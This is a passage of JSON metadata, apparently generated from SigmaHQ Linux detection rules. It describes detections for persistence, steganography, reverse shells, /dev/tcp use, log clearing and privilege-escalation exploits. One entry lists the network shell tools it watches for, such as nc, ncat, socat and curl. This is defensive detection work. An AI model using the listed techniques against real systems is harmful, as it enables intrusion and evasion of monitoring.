"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_pers_systemd_reload.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1543.002" - ], - "creation_date": "2019/09/23", - "filename": "lnx_auditd_pers_systemd_reload.yml", - "author": "Jakob Weinzettl, oscd.community", - "level": "low", - "falsepositive": [ - "Installation of legitimate service.", - "Legitimate reconfiguration of service." 
- ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects adversary creating screen capture of a desktop with Import Tool.\nHighly recommended using rule on servers, due to high usage of screenshot utilities on user workstations.\nImageMagick must be installed.\n", - "uuid": "dbe4b9c5-c254-4258-9688-d6af0b7967fd", - "value": "Screen Capture with Import Tool", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md", - "https://attack.mitre.org/techniques/T1113/", - "https://linux.die.net/man/1/import", - "https://imagemagick.org/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_screencapture_import.yml" - ], - "tags": [ - "attack.collection", - "attack.t1113" - ], - "creation_date": "2021/09/21", - "filename": "lnx_auditd_screencapture_import.yml", - "author": "Pawel Mazur", - "level": "low", - "falsepositive": [ - "Legitimate use of screenshot utility" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects adversary creating screen capture of a full with xwd. 
Highly recommended using rule on servers, due high usage of screenshot utilities on user workstations", - "uuid": "e2f17c5d-b02a-442b-9052-6eb89c9fec9c", - "value": "Screen Capture with Xwd", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-3---x-windows-capture", - "https://attack.mitre.org/techniques/T1113/", - "https://linux.die.net/man/1/xwd", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml" - ], - "tags": [ - "attack.collection", - "attack.t1113" - ], - "creation_date": "2021/09/13", - "filename": "lnx_auditd_screencaputre_xwd.yml", - "author": "Pawel Mazur", - "level": "low", - "falsepositive": [ - "Legitimate use of screenshot utility" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detection use of the command \"split\" to split files into parts and possible transfer.", - "uuid": "2dad0cba-c62a-4a4f-949f-5f6ecd619769", - "value": "Split A File Into Pieces - Linux", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_split_file_into_pieces.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1030" - ], - "creation_date": "2020/10/15", - "filename": "lnx_auditd_split_file_into_pieces.yml", - "author": "Igor Fits, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate administrative activity" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects embeding of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.", - "uuid": "ce446a9e-30b9-4483-8e38-d2c9ad0a2280", - "value": "Steganography Hide Files with 
Steghide", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1027/003/", - "https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_steghide_embed_steganography.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027.003" - ], - "creation_date": "2021/09/11", - "filename": "lnx_auditd_steghide_embed_steganography.yml", - "author": "Pawel Mazur", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects extraction of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.", - "uuid": "a5a827d9-1bbe-4952-9293-c59d897eb41b", - "value": "Steganography Extract Files with Steghide", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1027/003/", - "https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_steghide_extract_steganography.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027.003" - ], - "creation_date": "2021/09/11", - "filename": "lnx_auditd_steghide_extract_steganography.yml", - "author": "Pawel Mazur", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects suspicious activities as declared by Florian Roth in its 'Best Practice Auditd Configuration'.\nThis includes the detection of the following commands; wget, curl, base64, nc, netcat, ncat, ssh, socat, wireshark, rawshark, rdesktop, nmap.\nThese commands match a few techniques from the tactics \"Command and Control\", including not exhaustively the following; Application Layer Protocol (T1071), Non-Application Layer Protocol 
(T1095), Data Encoding (T1132)\n", - "uuid": "f7158a64-6204-4d6d-868a-6e6378b467e0", - "value": "Suspicious C2 Activities", - "meta": { - "refs": [ - "https://github.com/Neo23x0/auditd", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_c2_commands.yml" - ], - "tags": [ - "attack.command_and_control" - ], - "creation_date": "2020/05/18", - "filename": "lnx_auditd_susp_c2_commands.yml", - "author": "Marie Euler", - "level": "medium", - "falsepositive": [ - "Admin or User activity" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects relevant commands often related to malware or hacking activity", - "uuid": "1543ae20-cbdf-4ec1-8d12-7664d667a825", - "value": "Suspicious Commands Linux", - "meta": { - "refs": [ - "Internal Research - mostly derived from exploit code including code in MSF", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_cmds.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.004" - ], - "creation_date": "2017/12/12", - "filename": "lnx_auditd_susp_cmds.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Admin activity" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects program executions in suspicious non-program folders related to malware or hacking activity", - "uuid": "a39d7fa7-3fbd-4dc2-97e1-d87f546b1bbc", - "value": "Program Executions in Suspicious Folders", - "meta": { - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_exe_folders.yml" - ], - "tags": [ - "attack.t1587", - "attack.t1584", - "attack.resource_development" - ], - "creation_date": "2018/01/23", - "filename": "lnx_auditd_susp_exe_folders.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Admin activity (especially in /tmp folders)", - "Crazy 
web applications" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects commandline operations on shell history files", - "uuid": "eae8ce9f-bde9-47a6-8e79-f20d18419910", - "value": "Suspicious History File Operations - Linux", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.003" - ], - "creation_date": "2020/10/17", - "filename": "lnx_auditd_susp_histfile_operations.yml", - "author": "Mikhail Larin, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate administrative activity", - "Legitimate software, cleaning hist file" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects a creation of systemd services which could be used by adversaries to execute malicious code.", - "uuid": "1bac86ba-41aa-4f62-9d6b-405eac99b485", - "value": "Systemd Service Creation", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1543/002/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_systemd_service_creation.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1543.002" - ], - "creation_date": "2022/02/03", - "filename": "lnx_auditd_systemd_service_creation.yml", - "author": "Pawel Mazur", - "level": "medium", - "falsepositive": [ - "Admin work like legit service installs." 
- ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects System Information Discovery commands", - "uuid": "f34047d9-20d3-4e8b-8672-0a35cc50dc71", - "value": "System Information Discovery - Auditd", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1082/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_system_info_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1082" - ], - "creation_date": "2021/09/03", - "filename": "lnx_auditd_system_info_discovery.yml", - "author": "Pawel Mazur", - "level": "low", - "falsepositive": [ - "Legitimate administrative activity" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects system information discovery commands", - "uuid": "1f358e2e-cb63-43c3-b575-dfb072a6814f", - "value": "System and Hardware Information Discovery", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-4---linux-vm-check-via-hardware", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_system_info_discovery2.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1082" - ], - "creation_date": "2020/10/08", - "filename": "lnx_auditd_system_info_discovery2.yml", - "author": "\u00d6mer G\u00fcnal, oscd.community", - "level": "informational", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.", - "uuid": "4cb57c2f-1f29-41f8-893d-8bed8e1c1d2f", - "value": "System Shutdown/Reboot - 
Linux", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_system_shutdown_reboot.yml" - ], - "tags": [ - "attack.impact", - "attack.t1529" - ], - "creation_date": "2020/10/15", - "filename": "lnx_auditd_system_shutdown_reboot.yml", - "author": "Igor Fits, oscd.community", - "level": "informational", - "falsepositive": [ - "Legitimate administrative activity" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects extracting of zip file from image file", - "uuid": "edd595d7-7895-4fa7-acb3-85a18a8772ca", - "value": "Steganography Unzip Hidden Information From Picture File", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1027/003/", - "https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_unzip_hidden_zip_files_steganography.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027.003" - ], - "creation_date": "2021/09/09", - "filename": "lnx_auditd_unzip_hidden_zip_files_steganography.yml", - "author": "Pawel Mazur", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.", - "uuid": "9a0d8ca0-2385-4020-b6c6-cb6153ca56f3", - "value": "System Owner or User Discovery", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_user_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1033" - ], - "creation_date": "2019/10/21", - "filename": "lnx_auditd_user_discovery.yml", - "author": "Timur Zinniatullin, oscd.community", - "level": "low", - "falsepositive": [ - "Admin activity" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects possible command execution by web application/web shell", - "uuid": "c0d3734d-330f-4a03-aae2-65dacc6a8222", - "value": "Webshell Remote Command Execution", - "meta": { - "refs": [ - "Personal Experience of the Author", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_web_rce.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ], - "creation_date": "2019/10/12", - "filename": "lnx_auditd_web_rce.yml", - "author": "Ilyas Ochkov, Beyu Denis, oscd.community", - "level": "critical", - "falsepositive": [ - "Admin activity", - "Crazy web applications" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects suspicious shell commands used in various Equation Group scripts and tools", - "uuid": "41e5c73d-9983-4b69-bd03-e13b67e9623c", - "value": "Equation Group Indicators", - "meta": { - "refs": [ - "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_apt_equationgroup_lnx.yml" - ], - "tags": [ - "attack.execution", - "attack.g0020", - "attack.t1059.004" - ], - "creation_date": "2017/04/09", - "filename": "lnx_apt_equationgroup_lnx.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects buffer overflow attempts in Unix system log files", - "uuid": 
"18b042f0-2ecd-4b6e-9f8d-aa7a7e7de781", - "value": "Buffer Overflow Attempts", - "meta": { - "refs": [ - "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/attack_rules.xml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_buffer_overflows.yml" - ], - "tags": [ - "attack.t1068", - "attack.privilege_escalation" - ], - "creation_date": "2017/03/01", - "filename": "lnx_buffer_overflows.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects specific commands commonly used to remove or empty the syslog", - "uuid": "e09eb557-96d2-4de9-ba2d-30f712a5afd3", - "value": "Commands to Clear or Remove the Syslog - Builtin", - "meta": { - "refs": [ - "https://www.virustotal.com/gui/file/fc614fb4bda24ae8ca2c44e812d12c0fab6dd7a097472a35dd12ded053ab8474", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_clear_syslog.yml" - ], - "tags": [ - "attack.impact", - "attack.t1565.001" - ], - "creation_date": "2021/09/10", - "filename": "lnx_clear_syslog.yml", - "author": "Max Altgelt", - "level": "high", - "falsepositive": [ - "Log rotation" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects suspicious modification of crontab file.", - "uuid": "af202fd3-7bff-4212-a25a-fb34606cfcbe", - "value": "Modifying Crontab", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_crontab_file_modification.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1053.003" - ], - "creation_date": "2022/04/16", - "filename": "lnx_crontab_file_modification.yml", - "author": "Pawel Mazur", - "level": "medium", - 
"falsepositive": [ - "Legitimate modification of crontab" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects the use of tools that copy files from or to remote systems", - "uuid": "7a14080d-a048-4de8-ae58-604ce58a795b", - "value": "Remote File Copy", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1105/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_file_copy.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.lateral_movement", - "attack.t1105" - ], - "creation_date": "2020/06/18", - "filename": "lnx_file_copy.yml", - "author": "\u00d6mer G\u00fcnal", - "level": "low", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects the ld.so preload persistence file. See `man ld.so` for more information.", - "uuid": "7e3c4651-c347-40c4-b1d4-d48590fdf684", - "value": "Code Injection by ld.so Preload", - "meta": { - "refs": [ - "https://man7.org/linux/man-pages/man8/ld.so.8.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_ldso_preload_injection.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.006" - ], - "creation_date": "2021/05/05", - "filename": "lnx_ldso_preload_injection.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Rare temporary workaround for library misconfiguration" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects exploitation of Nimbuspwn privilege escalation vulnerability (CVE-2022-29799 and CVE-2022-29800)", - "uuid": "7ba05b43-adad-4c02-b5e9-c8c35cdf9fa8", - "value": "Nimbuspwn Exploitation", - "meta": { - "refs": [ - 
"https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/", - "https://github.com/Immersive-Labs-Sec/nimbuspwn", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_nimbuspwn_privilege_escalation_exploit.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1068" - ], - "creation_date": "2022/05/04", - "filename": "lnx_nimbuspwn_privilege_escalation_exploit.yml", - "author": "Bhabesh Raj", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects potential PwnKit exploitation CVE-2021-4034 in auth logs", - "uuid": "0506a799-698b-43b4-85a1-ac4c84c720e9", - "value": "PwnKit Local Privilege Escalation", - "meta": { - "refs": [ - "https://twitter.com/wdormann/status/1486161836961579020", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_pwnkit_local_privilege_escalation.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1548.001" - ], - "creation_date": "2022/01/26", - "filename": "lnx_pwnkit_local_privilege_escalation.yml", - "author": "Sreeman", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects shellshock expressions in log files", - "uuid": "c67e0c98-4d39-46ee-8f6b-437ebf6b950e", - "value": "Shellshock Expression", - "meta": { - "refs": [ - "https://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shellshock.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ], - "creation_date": "2017/03/14", - "filename": "lnx_shellshock.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": 
"linux" - } - }, - { - "description": "Clear command history in linux which is used for defense evasion.", - "uuid": "fdc88d25-96fb-4b7c-9633-c0e417fdbd4e", - "value": "Clear Command History", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.003/T1070.003.md", - "https://attack.mitre.org/techniques/T1070/003/", - "https://www.hackers-arise.com/single-post/2016/06/20/Covering-your-BASH-Shell-Tracks-AntiForensics", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_clear_cmd_history.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.003" - ], - "creation_date": "2019/03/24", - "filename": "lnx_shell_clear_cmd_history.yml", - "author": "Patrick Bareiss", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation.", - "uuid": "444ade84-c362-4260-b1f3-e45e20e1a905", - "value": "Privilege Escalation Preparation", - "meta": { - "refs": [ - "https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/", - "https://patrick-bareiss.com/detect-privilege-escalation-preparation-in-linux-with-sigma/", - "https://github.com/uber-common/metta/blob/master/MITRE/Privilege_Escalation/privesc_linux_filesystemweakness.yml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_priv_esc_prep.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.004" - ], - "creation_date": "2019/04/05", - "filename": "lnx_shell_priv_esc_prep.yml", - "author": "Patrick Bareiss", - "level": "medium", - "falsepositive": [ - "Troubleshooting on Linux Machines" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects suspicious shell commands used in 
various exploit codes (see references)", - "uuid": "2aa1440c-9ae9-4d92-84a7-a9e5f5e31695", - "value": "Suspicious Activity in Shell Commands", - "meta": { - "refs": [ - "http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html", - "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb", - "http://pastebin.com/FtygZ1cg", - "https://artkond.com/2017/03/23/pivoting-guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_commands.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.004" - ], - "creation_date": "2017/08/21", - "filename": "lnx_shell_susp_commands.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects suspicious log entries in Linux log files", - "uuid": "f64b6e9a-5d9d-48a5-8289-e1dd2b3876e1", - "value": "Suspicious Log Entries", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_log_entries.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2017/03/25", - "filename": "lnx_shell_susp_log_entries.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell", - "uuid": "738d9bcf-6999-4fdb-b4ac-3033037db8ab", - "value": "Suspicious Reverse Shell Command Line", - "meta": { - "refs": [ - "https://alamot.github.io/reverse_shells/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_rev_shells.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.004" - ], 
- "creation_date": "2019/04/02", - "filename": "lnx_shell_susp_rev_shells.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects space after filename", - "uuid": "879c3015-c88b-4782-93d7-07adf92dbcb7", - "value": "Space After Filename", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1064", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_space_after_filename_.yml" - ], - "tags": [ - "attack.execution" - ], - "creation_date": "2020/06/17", - "filename": "lnx_space_after_filename_.yml", - "author": "\u00d6mer G\u00fcnal", - "level": "low", - "falsepositive": [ - "Typos" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287", - "uuid": "7fcc54cb-f27d-4684-84b7-436af096f858", - "value": "Sudo Privilege Escalation CVE-2019-14287 - Builtin", - "meta": { - "refs": [ - "https://www.openwall.com/lists/oss-security/2019/10/14/1", - "https://access.redhat.com/security/cve/cve-2019-14287", - "https://twitter.com/matthieugarin/status/1183970598210412546", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_sudo_cve_2019_14287_user.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1068", - "attack.t1548.003", - "cve.2019.14287" - ], - "creation_date": "2019/10/15", - "filename": "lnx_sudo_cve_2019_14287_user.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects suspicious command with /dev/tcp", - "uuid": "6cc5fceb-9a71-4c23-aeeb-963abe0b279c", - "value": "Suspicious Use of /dev/tcp", - "meta": { - "refs": [ - 
"https://www.andreafortuna.org/2021/03/06/some-useful-tips-about-dev-tcp/", - "https://book.hacktricks.xyz/shells/shells/linux", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-1---port-scan", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_susp_dev_tcp.yml" - ], - "tags": [ - "attack.reconnaissance" - ], - "creation_date": "2021/12/10", - "filename": "lnx_susp_dev_tcp.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects suspicious command sequence that JexBoss", - "uuid": "8ec2c8b4-557a-4121-b87c-5dfb3a602fae", - "value": "JexBoss Command Sequence", - "meta": { - "refs": [ - "https://www.us-cert.gov/ncas/analysis-reports/AR18-312A", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_susp_jexboss.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.004" - ], - "creation_date": "2017/08/24", - "filename": "lnx_susp_jexboss.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects suspicious command lines that look as if they would create symbolic links to /etc/passwd", - "uuid": "c67fc22a-0be5-4b4f-aad5-2b32c4b69523", - "value": "Symlink Etc Passwd", - "meta": { - "refs": [ - "https://www.qualys.com/2021/05/04/21nails/21nails.txt", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_symlink_etc_passwd.yml" - ], - "tags": [ - "attack.t1204.001", - "attack.execution" - ], - "creation_date": "2019/04/05", - "filename": "lnx_symlink_etc_passwd.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" 
- } - }, - { - "description": "Detects the creation of doas.conf file in linux host platform.", - "uuid": "00eee2a5-fdb0-4746-a21d-e43fbdea5681", - "value": "Linux Doas Conf File Creation", - "meta": { - "refs": [ - "https://research.splunk.com/endpoint/linux_doas_conf_file_creation/", - "https://www.makeuseof.com/how-to-install-and-use-doas/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_create/file_create_lnx_doas_conf_creation.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1548" - ], - "creation_date": "2022/01/20", - "filename": "file_create_lnx_doas_conf_creation.yml", - "author": "Sittikorn S, Teoderick Contreras", - "level": "medium", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "file_create", - "logsource.product": "linux" - } - }, - { - "description": "Detects creation of cron file or files in Cron directories which could indicates potential persistence.", - "uuid": "6c4e2f43-d94d-4ead-b64d-97e53fa2bd05", - "value": "Persistence Via Cron Files", - "meta": { - "refs": [ - "https://github.com/microsoft/MSTIC-Sysmon/blob/f1477c0512b0747c1455283069c21faec758e29d/linux/configs/attack-based/persistence/T1053.003_Cron_Activity.xml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_create/file_create_lnx_persistence_cron_files.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1053.003" - ], - "creation_date": "2021/10/15", - "filename": "file_create_lnx_persistence_cron_files.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", - "level": "medium", - "falsepositive": [ - "Any legitimate cron file." 
- ], - "logsource.category": "file_create", - "logsource.product": "linux" - } - }, - { - "description": "Detects creation of sudoers file or files in \"sudoers.d\" directory which can be used a potential method to persiste privileges for a specific user.", - "uuid": "ddb26b76-4447-4807-871f-1b035b2bfa5d", - "value": "Persistence Via Sudoers Files", - "meta": { - "refs": [ - "https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_create/file_create_lnx_persistence_sudoers_files.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1053.003" - ], - "creation_date": "2022/07/05", - "filename": "file_create_lnx_persistence_sudoers_files.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Creation of legitimate files in sudoers.d folder part of administrator work" - ], - "logsource.category": "file_create", - "logsource.product": "linux" - } - }, - { - "description": "Detects the creation of the file \"rootlog\" which is used by the TripleCross rootkit as a way to check if the backdoor is already running.", - "uuid": "c0239255-822c-4630-b7f1-35362bcb8f44", - "value": "Triple Cross eBPF Rootkit Default LockFile", - "meta": { - "refs": [ - "https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L33", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_create/file_create_lnx_triple_cross_rootkit_lock_file.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/07/05", - "filename": 